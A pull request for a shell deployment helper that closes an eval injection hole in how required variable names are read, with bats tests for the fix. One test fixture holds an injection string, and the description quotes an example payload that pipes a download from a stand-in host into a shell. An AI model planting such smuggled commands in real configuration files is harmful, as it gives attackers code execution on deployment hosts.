### PR TITLE
fix(deploy): replace eval with safe indirect expansion in required_vars

### DIFF
--- a/lib/utils.sh
+++ b/lib/utils.sh
@@ -588,7 +588,12 @@ $_hint"
     local var val
     while IFS= read -r var || [ -n "$var" ]; do
       [ -z "$var" ] && continue
-      val="$(eval echo "\${${var}:-}")"
+      # Validate var name to prevent injection — only allow valid identifiers
+      if ! [[ "$var" =~ ^[A-Za-z_][A-Za-z0-9_]*$ ]]; then
+        fail "Invalid variable name in required_vars: '$var'"
+      fi
+      # Safe indirect expansion (no eval)
+      val="${!var:-}"
       [ -n "$val" ] || fail "Missing required env var: $var (check $env_file)"
     done < "$required_vars_file"
   fi

--- a/tests/test_cmd_deploy.bats
+++ b/tests/test_cmd_deploy.bats
@@ -509,3 +509,60 @@ LOG_LEVEL=debug"
   # LOG_LEVEL differs but it's not a volume var — should be silent
   [[ "$output" != *"divergence"* ]] && [[ "$output" != *"Divergence"* ]]
 }
+
+
+# ── deploy_prepare: required_vars injection prevention ────────────────────────
+
+@test "deploy_prepare: rejects hostile var name in required_vars (no eval injection)" {
+  local stack_dir="$TEST_TMP/stacks/hostile"
+  mkdir -p "$stack_dir"
+  echo 'services: {}' > "$stack_dir/docker-compose.yml"
+  echo 'GOOD_VAR=ok' > "$TEST_TMP/.test.env"
+
+  # Write a hostile required_vars line that would execute under eval
+  printf 'X:-}; echo PWNED; echo ${Y\n' > "$stack_dir/required_vars"
+
+  export GOOD_VAR="value"
+  validate_env_file() { true; }
+  export_volume_paths() { true; }
+  export -f validate_env_file export_volume_paths
+
+  # deploy_prepare should fail with "Invalid variable name" not execute the payload
+  run deploy_prepare "hostile" "$stack_dir" "$stack_dir/docker-compose.yml" "$TEST_TMP/.test.env"
+  [ "$status" -ne 0 ]
+  [[ "$output" == *"Invalid variable name"* ]]
+}
+
+@test "deploy_prepare: accepts valid var names in required_vars" {
+  local stack_dir="$TEST_TMP/stacks/valid"
+  mkdir -p "$stack_dir"
+  echo 'services: {}' > "$stack_dir/docker-compose.yml"
+  echo 'MY_VAR=hello' > "$TEST_TMP/.test.env"
+  echo 'MY_VAR' > "$stack_dir/required_vars"
+
+  export MY_VAR="hello"
+  # Stub validate_env_file and export_volume_paths (called by deploy_prepare)
+  validate_env_file() { true; }
+  export_volume_paths() { true; }
+  export -f validate_env_file export_volume_paths
+
+  run deploy_prepare "valid" "$stack_dir" "$stack_dir/docker-compose.yml" "$TEST_TMP/.test.env"
+  [ "$status" -eq 0 ]
+}
+
+@test "deploy_prepare: fails on missing required var (safe indirect expansion)" {
+  local stack_dir="$TEST_TMP/stacks/missing"
+  mkdir -p "$stack_dir"
+  echo 'services: {}' > "$stack_dir/docker-compose.yml"
+  echo 'X=y' > "$TEST_TMP/.test.env"
+  echo 'UNSET_VAR' > "$stack_dir/required_vars"
+
+  unset UNSET_VAR 2>/dev/null || true
+  validate_env_file() { true; }
+  export_volume_paths() { true; }
+  export -f validate_env_file export_volume_paths
+
+  run deploy_prepare "missing" "$stack_dir" "$stack_dir/docker-compose.yml" "$TEST_TMP/.test.env"
+  [ "$status" -ne 0 ]
+  [[ "$output" == *"Missing required env var: UNSET_VAR"* ]]
+}


### PR DESCRIPTION
Fixes #223

## Problem

`required_vars` lines were checked via `eval echo "\${${var}:-}"` — any line in that repo-synced file gets executed on deploy. A malicious PR adding `X:-}; curl evil|sh; echo ${Y` to `required_vars` = RCE.

## Fix

- Validate each var name against `^[A-Za-z_][A-Za-z0-9_]*$` — reject anything that is not a valid bash identifier
- Use safe indirect expansion (`${!var:-}`) instead of `eval`
- Clear error message on invalid names

## Testing

- Added 3 new tests: hostile injection rejected, valid vars accepted, missing vars caught
- `bats tests/test_cmd_deploy.bats` — all 38 pass